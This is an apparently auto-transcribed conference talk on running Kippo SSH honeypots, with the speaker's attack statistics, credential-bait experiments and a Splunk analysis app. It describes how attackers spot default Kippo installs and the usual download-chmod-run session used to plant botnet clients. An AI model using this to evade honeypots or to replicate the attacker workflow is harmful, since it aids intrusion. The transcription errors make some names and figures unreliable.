Security Onions and Honey Pots

thank you can you guys hear me is that good yeah okay thank you for that introduction um so as you said my name is Ethan Dodge um I'm also known as chippen on IRC just like everybody else here has a Alias so do I so actually I was never called chip into my face until yesterday and it was kind of a weird experience for me so you could go ahead and call me Ethan I would probably respond better to that anyway um anyway so the title of my talk was security onions and honey pots uh but now it's just honeypots because I really like them a lot so I'm going to talk about them a

lot I'm sorry if you guys came here and you wanted to to get some security onion demos you wanted to get the low down on that um I'd be more than happy to still go over it with any of you guys you guys can hit me up on Twitter or in IRC anytime email um and I'd be more than happy to to go over what I was going to go over um I I love network security monitoring it's what I do for a living so um so first off I got to read this disclaimer just real quick uh views Express in here are solely mine um and not the views of my employer or any

other organization which I'm associated with and I am responsible for the content of this presentation likewise the research conducted and Illustrated herein was performed by me unless otherwise noted all right so I got um want to talk about a little bit about the audience that I that I want to address here pretty much I think those three categories cover everybody and that's what I really like about honeypots you don't have to have a ton of experience to get into them and you could learn a heck of a lot from them um um so so I'm talking I'm talking to the noobs that this is their first security con bides last year was my very first

security con and I remember I was amazed by well I still am but I just remember my mind being being blown by every talk that I listened to at bze last year I was like they can do that no way anyway it's also kind of depressing cuz it's like oh I fight you guys for a living and yet you're way ahead of me in the game so anyway um also those looking to get into the Honeypot SL thread intelligence communities and those that may already have experienced honey potting um what I really like it I love talking to other people that have experience with honeypots um and that do their own research on them because we

always bounce ideas off of each other um I always learn something new almost every time I talk to somebody um um I'm actually I'm actually doing some research with a group um that there's let's see I think there's like 18 19 of us and we're all collectively doing we have a ton of honeypots collectively and we're doing research um I think we have about 40 hosts now um and I'll talk a little bit about that later on in the presentation um so let's get to it honey pots um beware of addiction if you guys are going to get into this it is addicting you could ask my wife I'm up till I'm up till like 4:00 in the

morning almost every night because I'm just love I love modifying my honey pots I love uh looking at the malware that's coming in stuff like that so I thought that that uh meme was fitting um sometimes I feel like going to The Poon like get away give me my honey so um why honeypots why honeypots um how many of you guys okay let's be honest do not please don't be afraid to ask any questions don't be afraid um to um to admit that you don't know something how many of you guys don't know what a honey poot is is there anybody here you in the back okay Rob I know that you know what a honey poot

is I talk to I talk to you about my honey Poots like twice a week so um how many of you guys are skeptical of honeypots and their and their um let's see how many of you guys are skeptical with honey pots and and what they can do if they can really if they're really of value anybody in the room yeah I know there's quite a few people that don't really think that honey pots are worth it and I and I definitely see the point you know you stand up you stand up a a vulnerable host and somebody gets some script Kitty gets into it woohoo like of course that's going to happen there's SC the

internet 24/7 um or people like to throw out this reason threat intelligence right uh kind of one of the bu buzzword and and yeah yeah I mean it's true like who am I to stand up a ton of vulnerable hosts and then say Oh I'm getting attacked from the from this IP with this malware and you should watch out for it like that's not real threat intelligence right that's just some kid having fun and thinking he's awesome um I really like this meme as well um red intelligence it's just a stupid RSS feed found it on Twitter I had to do some editing um there was another word in there sure some of you guys saw it um

anyway uh it it threat intelligence has become one of those buzzword that you hear and I've already said it like 20 times so I'm sure some of you guys have already taken some drinks um but it's it's almost like cloud and Big Data um heart bleed you know there's some more drinks go for it um anyway but it it's it um honey potting can lead to high integrity thread intelligence if you put time into it and you do it right um the the problem with some of these companies um any of you guys familiar with like Norse or crowd strike or mandiant that sell uh thread intelligence um awesome products awesome companies um I'd love to work for one of

them one day um um just throwing that out there anyway um they but the but but part of the problem is I mean even with such an awesome product where they I mean they have they have hundreds of hsts all over the internet that are gathering this threat intelligence but it's unless you're willing to pay a ton of money uh it's never really targeted threat intelligence right it's never it you you may have a completely different environment than the environment that they're that they're um monitoring right um and the M maybe they're may maybe they're selling you Intel for uh Windows malware and maybe you got an entire um Linux environment you know or or vice versa or

whatever it may be it's it's often times very hard to get some tailored intelligence um this article um showed up in dark reading it was like two years ago um but it was a good it's a good article five reasons why every company should have a Honeypot um and it just goes through and it talks about how um that you can like what I was just saying you can get tailored intelligence you stand up a host um that is vulnerable and you could go in there and and if you do it right and you don't make it obvious that it's a honey poot and they actually try and exploit uh your network your your um you could have

an entire honey Network and have multiple boxes that they could pivot to and exploit and stuff um you're going to be able to see um what kind of attackers are specifically targeting your company um or or whatever it may be right and and once and then also if they are targeting you you'll be able to see what they do when they get in what what what are they trying to accomplish um now there I mean don't get me wrong there's tons of cyber criminals out there that don't necessarily have a Target um I guess they're not cyber criminals they're more script kitties but and they're just scanning the entire internet trying to find vulnerable vulnerable boxes and pop as many boxes

as they can and brag about it on Twitter um and call it activism but um thanks for the the sympathy laugh whoever anyway um so yeah I I I would highly recommend a Honeypot um so let's go through the different types of Honey pots um how many of you guys have ever heard of of of honey drive okay we got a few in the room how many have actually deployed it any of you guys you back there what do you think think it's sweet what do you what do you like about it yeah it's true that's very very true are do you have multiple instances of it or now tell me this did you have

multiple of the honey Poots running at the same time on there or did you kind of alternate just one or the other see and that's kind of honey honey drive is really so hold on let me tell you what honey drive is first of all it's a it's a Linux they call it a distro but really it's just dunu with a ton of Honey pots pre-installed onto it um and uh you you deploy that you deploy the the the iso and it comes pre-installed with kippo uh Dion I for I don't know how to pronounce that honey glass top F con con poot Thug and it also comes with some visualization um applications such as

kog graph honey dvis uh di I'm sorry whoever the developer is totally butchering the name and Elk elk stack um anyway so my beef with honey drive is it's super super good if you're just um trying to get into the scene and and and that's probably who um who they tailored it towards were were people like that but if you have if you have Port 22 and Port 80 and Port 443 and Port 12 123 and Port 53 open all open on one IP address and they're all exploitable and they're super easy to get into they're going to know that they're in a honey poot right that so so you're NE they realistically you're never going to run every single

one of those at the same time and honestly um like I said it's a Ubuntu distro so a lot of RAM is taken on it's running on xub bunu and a lot of RAM is being taken up by the by the desktop environment um my personal favorite um that of the on that list is kippo um and I'm running hippo on some boxes that only have 256 mega ram I've been tinkering with the idea of running of trying to get it to run excuse me on on some boxes that only have 128 Mex of ram I was talking to the developer and he said that that would be pushing pushing it a little but uh I I I want to try it

nonetheless so honey drive I would recommend it if you're trying to get in the scene because like he said all the hard work is done it come the all the honey pots are installed you just got to do uh do/ start. Dosh and there you go so um so there are low interaction and high interaction honeypots um and each have their purposes um low interaction is typically a simulation um it's probably like a virtual environment um with incomplete functionality um for instance if you hop on we're going to go over a lot of this here in a little bit but you won't be able to run all the commands uh that you normally would be able to on if

it was a Windows host or a Linux host or whatever it is um you can't can't really be used to exploit um other vulnerabilities because you don't have a whole lot of functionality in there unless they learn how to pop the honey unless they know that they're in a honey poot and then they learn how to pop the honey poot then your host is screwed right um then they could take over that whole network anyway um used to observe Behavior right so a script Kitty gets in he downloads some malware you could go in you could reverse reverse engineering that malware um uh there were a couple of really good malware talks at this conference that I went to um I would

highly recommend going back and looking at them um I I've recently gotten into malware analysis however I'm still such a new about it um but those talks got me really excited about it um so uh an example of a low interaction Honeypot would be kippo um um and then there's also High interaction where High interaction is an actual machine they're going to have full capability um and somehow you're either like tapping the line of all the and getting all the traffic that's going to that box or you have some sort of proxy that's uh decrypting the traffic if it's encrypted or just picking it up and logging it on and sending it back to you

somehow um a lot I I haven't seen a ton of these developed unless it's like I would imagine if it was like in-house like a like a big Enterprise they they threw out they duplicated their web server and then just tapped the line and made that that uh that particular IP address vulnerable and whatnot um there there's a lot of ways that you can go about doing it um they're used to observe targeted attacks you're going to get a lot higher uh Integrity thread Intel um from from that um and they're not supposed to be easily detectable um and one example is uh of one that actually it's an alpha testing right now it's called bifrost I was really hoping

to try and get it deployed before bsides so I can uh talk a little bit about it but I have not been able to yet um but I will probably blog about it when I do so um if you guys want to check that out but um so kipo let's go over kipo like I said this is this is the one that I'm running I currently have five hosts running kipo I had six but then one completely got hosed and I didn't have time to get it back up and running before bides um and it was not because I got poned it just the hard drive failed I was running it on my home network by the

way if you run it on your home network I was actually running honey drive so maybe honey drive did it anyway if you run it on your home network make sure you firewall that sucker and make make sure that it cannot get out to your actual home network because that would be very bad I would recommend Indian firewall or pfSense anyway kippo is a medium interaction SSH Honeypot designed to log Brute Force attacks and most importantly the entire shell interaction performed by the attacker um that's straight from the GitHub uh the kipo GitHub um like it says it logs the entire shell um session right there and it sends it back to you in a log there are several

um tools that you could use for Vis visualization that will kick back the logs to you and show you exactly what the attacker did um and you could see if it tried to download any malware or if he tried to download an entire Windows ISO and just totally hosed your entire machine it's if you're running small on small boxes that which has happened to me before so um anyway so how kipo Works um is anybody here familiar with kipo how many of you have have used kipo you two okay um are you guys familiar with how it works yeah so basically kipo just runs in a virtual python environment um and it simulates a Debian I think it's a Debian 5 or maybe

Debian six box um and and it's uh it's programmed to respond to the basic basic Linux commands such as LS ping if config uname uh PS all your basic CIS admin stuff it's it's uh it's programmed to respond to that but the problem is all the outputs of that command of all of those commands are static so it's really easy to tell if it's kipo they're just sitting they're just sitting in a file that the script calls and just outputs that file right um so so and we'll get get into how easy to detect also you could um it it depends on a file called the fs. pickle file which is what simulates the file the deban file system

and you can create your own fs. pickle file um pretty easily I I I did mine in like two minutes um and I'll go over how to do that too um okay so how to detect kipo this is these are some fun interesting examples so you'll see here in the top top right um you'll see that the server prompt the the command prompt is root at server 03 that is the prompt for kipo right out of the box so if you do not change anything um and the kippo is so widespread and there's so many hosts on it on the internet that anybody's going to log in see root at server 03 and they're going to hop right

out like that is the first thing that I would change if I were you um um also you'll see below that I was able to Ping 999999999999 and it somehow res resol Sol to 23623 um so um and you'll also notice that I actually I had the count flag on there to only send three packets it sent six so until I and I actually had to stop it I think there was a control C somewhere in there um anyway um and then also if have config so it was actually meta cortex that pointed this out to me um if you do an so you'll see here I did an if config twice and those of you

aren't familiar with if config it it it it shows you your network status your IP address uh your Mac address um and um here at the bottom um it uh it has the RX bites byes and TX byes and if you're loged in V SSH to a box if you did I if config twice those should change but you'll see they haven't so that's also a super easy way there's a ton of other easy ways to and and we'll talk a little bit about it as it goes on there's several metas sploit um um metlo modules that will detect it before the user even logs in before logging um I'm not so I'm not nearly smart enough to know how

exactly that works um a friend of mine Andrew Morris um he does a lot of work with kippo and he actually wrote the most recent one um and it that one has since been patched um I was going to pull up his blog article uh about that but his blog is down for some reason so when it comes back up I'll tweet it out or something um uh yeah so there's some really really simple ways to hide kipo make it less detectable um like I said the first thing I do is I change that host name um add a login Banner so when I first deployed kipo and I was getting ready and it was the first time um and I was

trying to gather all this data and research I just deployed it right out of the box I didn't change anything just default settings I didn't have a single I well I had some successful logins but they they logged in then hopped right back out right they didn't even run any commands because it was so obvious that it was a kipo box I added a login Banner changed the host name like within an hour I had um I had I had scripted malware attacks coming in um and they were trying to download all this stuff and really cool so um so just those two while they're still it's still not going to be incred high integrity um malware or thread

Intel they they do a lot um edit the user db. text the user db. text file is what kippo depends on for the credentials right out of the box it accepts well depending on what Fork you pull from um but the original one accepted only root as the username and then 1 2 3 4 5 six as the password um then uh the most the most commonly used Fork of kipo now um accepts anything but that combination um that's also a super easy way to detect if you're in a honey box if it accepted two different credentials for the same user or two different passwords for the same user that that's a red flag right change the

file system so there's a really s there's a really awesome script called create fs. piy um basically um so and and and it it will take any mounted uh any mounted hard drive any mounted file system and it will create the fs. pickle file out of it so I just spun up a new buntu VM that was serving up some DNS um and ran that script and I had a new fs. pickle file and all of a sudden my kipo instance was uh was simulating a Ubuntu box and not a Debian box um that can do a lot um how however it and I'll get into this it's arguable if changing the file system is

really what um is is really helps you because so much of it scripted um edit the Etsy password and the Etsy Shadow files um and edit the script output edit the if config output edit the PS uh output that's another thing the PS output is is uh um static and we all know that the PS output should be changing if you're it processes are always ending and running and everything so um okay so this is this is the exciting part here um I'm going to go into my findings what I found um like I said I have been running um five hippo boxes for a couple months now well I spun some of them up at different times

but I've been doing it for a little bit here um I I I just find really cheap hosting a really cheap VPS and I buy it and then I just I throw kippo on it and uh and then make make my modifications and then and observe so I have I have two in the United States two in Canada and one in Europe um and these are my two two boxes they're both in La um you'll you see that the top graph so the oh these are graphs of login attempts versus login successes the blue is login attempts the yellow is login successes there's a whole lot more blue than yellow right um so you'll see the top

one had this is this is over the past 30 days so from uh I pulled these last night at like 2 in the morning or this morning at like 2 in the morning um and uh you'll see um that it's had that top one has had 59 total attempts and 10 successes and the bottom one has had 3,924 total attempts and two successes uh does that seem high or low to you guys low why does it seem low who said that what do you why why is that low yeah so I'm not going to lie and I don't know what at the I have haven't done I haven't had enough time to do enough research to know exactly why it

those two boxes are getting the data that maybe they' I don't know maybe there's some underground community and they they've been flagged as uh they've been flagged as honey possums I doubt that's the case anyway um but uh so um the bottom one there's only two there's only two successes though and there's a reason for that um so I changed the credentials on the one at the bottom uh graph the one that had the least amount of of successful logins so the top graph I just left it at the default Route 1 2 3 4 5 6 and they get in and a lot of times that's a red flag for people it's like oh that's definitely a Honeypot if

it's that easy to get into actually you never know so um I know there's tons of CIS admins in here that know exactly what I'm talking about um the bottom one I changed it to only accept a 14 character password for the root user 14 character password how hard is that to crack it's crazy crazy hard unless um unless you do something I my boss is actually really really good at password cracking and he's cracked I think he claims to have cracked 16 character passwords and whatnot um anyway um so I actually you'll see it says I leaked the the password there um what I did is I leaked the the 14 character password uh to the Honeypot on

ppin um just to see what it what what what would happen um I was just really curious I had a buddy do the same thing um and you'll see that's the format that I did it in I just listed the IP listed the user listed the password and just and threw some leite language in there and pretended like I was a activist that that just poned this box or whatever and uh um so I posted that at 1:14 a.m. Mountain Standard Time any guesses as to how long it took before I saw a login 30s 30 seconds wow who said that that is that okay what else any other guesses 20 seconds wow you guys wow guys

have um the so I will say this that in under two minutes the um the pace bin had over a 100 views um and that's just because there's so many Bots mining pin for credentials right um so you guys actually I thought I didn't know anyone was going to guess as fast as you guys did but at 2 hours and 35 minutes I thought that was crazy fast um that I saw a successful login and you know I so I saw it at 349 from a Romanian IP address that had malicious intent with a 14 character password logging into a box with malicious intent you know that they saw that link on faceb there's no way

that they cracked it and it just so happens they cracked it 2 hours and 35 minutes after um I after I posted that and that was the first time I'd ever seen that IP come out any of my boxes um like I that that that slide is wrong I it's it had over 100 views in two minutes um I saw five uh different logins from three distinct IP addresses over the course of 12 hours and then I didn't see any more until just like last week I got two more logins to that box um uh but the so the the other two IP addresses they were just they had like no malicious intent they just hopped on

the box we're like yeah look at me I'm so awesome I'm on a box on somebody else's box you know so I made this meme their honor whoever you guys are that's what I think of you just kidding I'm sure you're great people okay so the this excuse me the these are my stats uh login attempts versus successes in the past 30 days on two boxes that I have in Canada what first off what stands out to on those two graphs to you guys boom yeah yeah and that is what we call a hosting problem you get what you pay for cloud at Cost super cheap but you get what you pay for right um so these boxes were

actually seeing super steady attacks and it so so rather than this being 30-day data this is more like 15-day data um or so I I didn't look exactly but anyway the top one had two 255,000 attempts with 79 um successes and the bottom one had 282,000 with zero successes um and there's a reason for the zero success one um and that and the are these more the who who said that you wouldn't expect that low on my other American boxes yeah is this kind of what you would expect for for total attempts and successes and whatnot yeah this I mean there are like I said there are people from all over the world not believe it

or not it doesn't just happen in China it happens elsewhere yes yeah uh yeah exactly that actually type in a password uh username and a password um if I did scans oh my gosh the number would be way bigger than this way bigger um I think last I checked uh one of my honeypots was like averaging like 40,000 scans a day or something like that um I I could get that data for you um so yeah these are actual when I say login attempts they actually enter a username and password and it either succeeded or it failed um so anyway um so let's take a look at why I saw more logins on one than the other so I

changed the user to db. text on one and the one on the top graph I you I I said it to only to reject the top 100 passwords that I got from a buddy uh to um da 667 on Twitter if you guys are familiar with him um he he lent me that and uh um and then combined with the top 10 usernames so any combination of those 100 passwords and 10 usernames it just rejected it um but anything else it would take so I'm kind of running a so I'm running a risk there because it's possible to log in as the same user with two different passwords right so that um but I mean I'm just doing research

trying to see what kind of data I get see what different behaviors give me what different actions give me what different behaviors and whatnot um so the other one only accepts a seven character password um from five different usernames so it's I think the usernames are like root FTP um and like John and Bob or something like that I I don't know anyway I I could go in and look but it's a seven character password I had a f I had like a six character password on another box and it was cracked in like in like four days um but this one has yet to be cracked um I actually leaked a key logger dump um of an of a of a VM

that I just span up spun up um sshing into this Honeypot and it and so it the key logger had the creds in there and I leaked that on ppin rather than explicitly um saying hey these are the creds to this IP address I just did the key logger dump just to see what I get I dumped that this morning at 7:53 still haven't seen um anything um but I definitely will either tweet or blog about it when I do um also on these two boxes I CH this is where I changed the fs pickle the story that I told you that I SP up a new bunu box ran that script and uh and substituted that um I'm yet

to see any differing results um but like I said everything is so scrip everybody's scanning the internet um all day every day and then as soon as they get into a box so their scan is scripted and then they get into a box and the execution of the commands is all scripted too they don't even bother with a file system mostly um and uh I'll definitely Vlog about that as well so so here's my box in Europe um login attempts versus successes in the past 30 days I think I stood this one one up like a a little bit less than 30 days ago so that's why you don't see data right there at the very beginning um it

has had 4,29 um uh login attempts and zero successes it's because I'm running um it's an eight character password um and it's been um and it yeah CP crack this is in the heart of of Europe um it it uh is my most attacked box but but I the buddies that I'm doing research with they have a ton of boxes in Asia and it's not attacked as much as as those boxes are um and just yeah yeah yeah I I I have a slide about this at the end but this particular one is uh time for which right now the euro is super low so it's a good deal um and I got that for a

whole year um and uh and because it's in because it's in uh in in Europe I put the login Banner in Spanish because I speak Spanish and I just wanted to see if there was any any correlation I don't know how I measure that but just being having fun you know so um so this is what a typical malicious session looks like um usually they hop in they W get and curls some some script or executable they chamod it um execute it and delete it 99% of the time this is all scripted you could see these attacks um wg- C and then it downloads that script that 1818 script mods it and then runs it this

particular guy didn't try and delete it but usually they will um and then they hop off that's all they do and it's like a lot of the time that it's like some uh ious uh binary um or a ton of the time it's just an IRC bot that they're trying to execute and and and recruit for their botn net um which is fun actually um I Le I learned this tactic from a cooworker who's actually in the room um to analyze the uh IRC um to see what what what server they're logging into V IRC and join that chat room and see what's going on in the chat room um that's a lot of fun sometimes you could

find the guy that's running it um and I had a I had a friend who actually he uh he logged into the the IRC server he found the guy um that was running the botnet and he convinced him to like shut it down it it was really interesting experience apparently he's super persuasive over IRC he's a he's a good friend I like him a lot occasionally you'll get a whole lot more commands um and uh like this these are this particular session there was over 100 commands um and that's just a list of 20 right there still still malicious um this is a typical detection if they don't detect it before they log in they'll usually C something like proc

CPU info which is also static or they'll do a ps- a ux or they'll do um un name- R is actually probably the most common one I see um sees that it's a default kipo content and then they will hop out so kippo visual visualization um the old and the new um you guys that have deployed kipo before what are you guys using for using for visualization are you using kipo graph yeah anybody not using excuse me anybody not using kog graph no um anybody ever used um mhn no I don't have any experience with that um anyway this is this is a this is a kog graph just runs uh an HTTP server on the same box um as your kipo Honeypot

and it graphs the stats for you it's just some HTML thrown together um and this this is cool this is my favorite thing about kog graph is that it will actually play back the entire session for you in real time and type it out like and it will even um like if they paus for a minute in the middle of typing then it will it and then and then pick it back up it will wait for as long as they paused right and it it's funny to see it's funny to see the scripted ones that are just running like a 100 commands and like it's coming up with all these errors because kipo doesn't know that command but it's just still

going it's like yeah this is a script um that's just an example of the graph that kippo will give you um how many of you guys have seen this app Tango Honeypot intelligence it's really new has anybody seen it no so I'm sorry his name kind of got wrapped around on the other line but Brian warheim a cooworker of mine really good friend um he uh he developed this and um he just released it I think last week and then this official page for um it's a Splunk app he submitted it to Splunk and Splunk accepted accepted it and that um that page um just went up I think like three or four days ago um and

Tango Honeypot intelligence is awesome how many of you guys have ever used spunk yeah so you guys all know how powerful it is right so imagine if you have all your honeypots feeding into Splunk and you could parse through that data with Splunk and look at anything you want graph anything you want it's super awesome super super awesome um it's demo time um you expect the demo to work perfectly what what did I say you're going to have a bad time let's see so let's see if I could connect to the internet if I can't I recorded it just in case doesn't look like I can I'm not even getting anything anyway so that is exactly why I

recorded it give me a second

here okay you got to be freaking kidding me oh oh oh I know why wrong app wrong app here we go woo I knew the demo gods were not going to like me today so this is this so hold on before before it starts playing um basically like I said uh Tango H it's still G anyway Tango Honeypot intelligence will um you set you you install the spunk forwarder on your Honeypot it forwards all the logs so your Splunk instance and Splunk indexes them and uh Brian has created a ton of apps uh a ton of Dash W I'm sorry um to illustrate type of stuff you're seeing you'll see you got a daily overview um

you got successful login failed logins login attemps fors successes Lo latest successful logins attackers logging into multiple sensors there were no instances of that that's why it's showing no results um he's got the session play log he doesn't have the capabil he doesn't have the capability that kogap does of actually being able to play it back for you in real time but as long as I can see the commands I personally don't really care um so you'll see it gives a a session ID to each session so you could you could search and Splunk for that session ID and bring up everything that that had to do with that session it has the attacker IP the sensor that it

hits um the message count message count is how many commands were run in that session um and then in this dashboard you could also go in and select the hpo2 that's my that's a one of my honey Poots um and it pulls up all the sessions that it saw in you see that last 12 hours that it's pulling up all the sessions that it saw for that Honeypot in that um particular time frame um it shows you when the session time started shows you the end time shows you the durations shows you the passwords accepted if any more passwords were attempted see no no other passwords are attempted by one except for 1 2 3 4 5 six obviously a

Honeypot right maybe um and this guy just he did he echoed lsed and then he just logged out um did he download anything no he just catted the known host which I believe is also static um so let's go look at the attacker profile now um any questions about the app so far no okay this is its first demo so you guys are I was I was a big part of the of the testing of it before he actually submitted it so um let's see so I'm I I'm going back to grab an IP because I need to provide that dashboard with an i IP of of an attacker here so just going to copy and

paste it here and then and we'll see the uh the

results you know um I think your honeypop pushes it um but I'm not 100% sure it very well could be polling um I could ask Brian let me call him up just kidding um if you but if you hit me up like on IR your Twitter on Monday I can answer that question for you um so I don't know if you guys saw but it P it pulled up the set all the sessions that that particular attacker had done in that time frame it shows you where the attack was coming from um and and a bunch of other stuff um so here I think I'm grabbing a session ID for the next dashboard or an IP oh I'm grabbing a

Chinese IP because we all know that what Chinese are all malicious and when it comes to to this stuff right everything is China if you're

bingy oh yeah I'm bringing up a one that I thought may have just showing you that it will it'll bring up different IP addresses I was hoping that that guy had multiple attacks then it would show you whatnot um oh and oh yeah right there at the bottom it'll show the files downloaded um and it'll give you the shot 256 hash of that file um and coming up here U he actually has a dashboard that will go out and call the virus total API and submit that hash to virus total and and uh then it will tell you if it's been seen by anybody else or not pretty cool um so this is session analysis human it human versus bot

identification um I'm not too sure exactly what he does to determine that but I could definitely ask him if anyone's curious those are rare commands enter during the session that we don't see very often obviously that the executable of that 1818 I think that was the only time that I think it was only downloaded on one Honeypot um

so so we're going to so this is just going to show you the top countries with login top countries scanning so look at look at the top countri scanning why not right everything is China so anyway I'm going to pause this video and go to the next one um if you guys don't mind here this one's a little shorter this is going through the file analysis that I was just telling you about that will call out to virus total so I'm pull so I'm pulling up all the latest file downloads from the past seven days um just waiting for the data to populate here

and those are all the files that were downloaded the last seven days keep in mind this is only monitoring five honeypots um in our environment where we have 40 feeding into our SM environment you'd see a whole lot more um and it's got the Sha 256 hash um the attacker IP the sensor that it was downloaded onto the session ID um and then you'll see this drop down window it autofills with all the Top Shot 256 hashes and and then you'll this particular hash it's going out to virus total and you'll see um all those vendor signatures it's been submitted a virus total before so it's not unique it's been seen before um however this one that I'm pulling up

right now has not you'll see the vender signatures unknown it's that was not submitted the virus totally before which is pretty cool U but it's probably just a variant of some other piece of malware or something um top 10 malware signatures seen over time he's pulling that from from virus total I believe um uh uh legitimate malware scene I'm not super familiar with what he's trying to do there um potential malware files the ones that result didn't result uh didn't come back with any results from virus total um then we got malware campaigns that this doesn't come up with anything um he looks at the URLs if they're coming from the same URLs if it's the same type of Campa same type of

um malware the same basically same script just different name or whatever where they're coming from he's trying to aggregate data um and this is obviously a lot more useful if you have more than five honeypots feeding into it right so let's see then time yeah like I said so I'm I'm I'm uh participating in with a bunch of buddies we're doing a lot of research right now and um there's probably about I think 15 of us are actually feeding honey pots in the one spunk app and I think we have about 40 honeypots um and the data in there is freaking awesome so um U we're call we call ourselves threat Incorporated if you want to follow us on Twitter and we're

going to start publishing reports and stuff like that um and then this one just goes over the network analysis nothing super super exciting um it just shows you the top domain scene that the malware came from um and same URI on multiple um on multiple domains the last IP addresses seen whatnot any questions any other questions about the app so it's open source and it's free I'd highly encourage you to go download it if you get if you don't have any experience with uh Splunk there may be a little bit of a learning curve but I would definitely recommend that you learn spunk as well because it's becoming very very popular in the industry um

so um there are some downloads for you there's the original kippo um the kippo fork that I use um um the kippo fork that I use is maintained by Michael osterhoff and he um as far as I know he's he's actually the only kipo developer that's actively maintaining his Fork um and he he supports SFTP and Json logging and so if you're going to use Tango you I I believe you have to use his Fork because Tango uses Json logging um and he updates it regularly I think the last commit that he had was like three days ago um download Tango right there download honey drive um and then here are my hosting links I host at

chrisk um at Cloud at Cost time for VPS I find these deals at lowen stock or loen talk.com um and yeah I pay I pay almost nothing for him some people that you probably want to follow if um if you want to get into the scene Andrew Morris I mentioned him Brian warheim Michael osterhoff uh da 667 I think I mentioned all these guys and thread Incorporated like I said is the group of us that that are collaborating together um that's my contact info you can find me on free node under chip in Twitter under chip in my blog is Boots pen.org um and uh any questions yes in the back yeah yeah you you

go uh I haven't heard anything yet I I don't imagine so because I mean like I said they're they're scanning the internet anyway their IPs are going to get scanned anyway and it's if if any data gets lost it's I hope they're doing a good enough job that's only going to be my data you know but I don't have any sensitive data on there

yes um so the only interaction that I've had with other honey Potters is mainly uh independent researchers and um but I would imagine that there are Enterprises that are doing that um it sounds like a really really good idea um so it would so I personally have not no but I um but it sounds like a great idea there was another question no any other questions yes

[Music]

um um so I mean if they're downloading illegal content um yeah I guess I could get in trouble but um so I mean uh I get so they're obviously able to download um but they have to actually get I'm sorry no but you can um I'm not personally no U but the fork of kippo that I use does support SFTP um and so you can do that that's a good question do you have a question

someone yeah yeah for sure and that's like my that's my favorite part about honey potting actually um I didn't go super into it cuz I wanted to I not a lot of people here have used honeypots and I figured that would be the case um but I'm uh Andrew Morris the guy that I pointed out here um he he's really good at that um well a lot better than me anyway and he's and he me and him will go through a lot of malware together and we'll we we just he has an Ida Pro license and all usually just use GDB um and then we may we may even execute it in a in a sandbox environment and run

wire shark and see where it's calling out to and and stuff like that so it's a yeah so I I I've dabbled in it definitely not super good at it though any other questions all right thank you very [Applause] much